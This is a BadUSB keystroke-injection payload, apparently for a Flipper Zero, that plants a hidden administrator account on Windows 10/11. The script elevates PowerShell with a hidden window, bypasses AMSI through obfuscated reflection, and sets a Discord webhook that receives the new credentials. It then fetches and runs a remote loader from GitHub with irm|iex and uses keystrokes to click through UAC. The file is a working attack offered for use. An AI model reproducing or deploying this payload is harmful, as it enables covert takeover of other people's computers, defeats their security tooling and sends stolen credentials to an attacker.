REM ============================================================
REM 👤 Create Hidden Admin - Windows
REM ============================================================
REM Author: dil1thium
REM Version: 3.0 (Modular)
REM Target: Windows 10/11
REM Category: Execution
REM Requires: Admin (UAC prompt)
REM
REM Creates hidden administrator account.
REM Default: sysadmin / P@ssw0rd123!
REM
REM CONFIGURE:
REM   YOUR_DISCORD_WEBHOOK - Receives credentials
REM ============================================================
ID 1234:5678 Manufacturer:Keyboard
DELAY 500
GUI r
DELAY 400
STRING powershell Start-Process powershell -Verb runAs -ArgumentList '-w h -ep bypass "$a=[Ref].Assembly.GetType(''System.Management.Automation.Amsi''+''Utils'');$f=$a.GetField(''amsi''+''InitFailed'',''NonPublic,Static'');$f.SetValue($null,$true);$env:DC=''YOUR_DISCORD_WEBHOOK'';$env:M=''admin'';irm https://raw.githubusercontent.com/reschjonas/FlipperZero_BadUSB/main/remote-payloads/loaders/loader.ps1|iex"'
ENTER
DELAY 1500
LEFTARROW
DELAY 200
ENTER
